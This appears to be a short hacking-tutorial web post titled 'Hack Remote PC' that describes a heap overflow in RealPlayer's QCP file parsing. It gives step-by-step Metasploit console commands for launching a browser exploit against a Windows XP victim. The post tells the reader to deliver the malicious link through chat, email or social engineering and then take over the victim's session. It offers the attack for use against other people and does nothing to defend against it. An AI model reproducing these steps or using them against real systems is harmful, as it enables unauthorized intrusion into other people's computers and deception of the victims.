Hack Remote PC with Real Networks Real player QCP Parsing Heap Overflow Exploit

This module exploits a heap overflow in Real player when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.

Exploit Targets

RealPlayer 11.0 – 11.1

RealPlayer SP 1.0 – 1.1.5

RealPlayer 14.0.0 – 14.0.5

Internet Explorer 7.0.5730.13

Apple RealPlayer


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/realplayer_qcp

Msf exploit (realplayer_qcp)>set srvhost (This must be an address on the local machine)

Msf exploit (realplayer_qcp)>set uripath realplayer (The Url to use for this exploit)

Msf exploit (realplayer_qcp)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *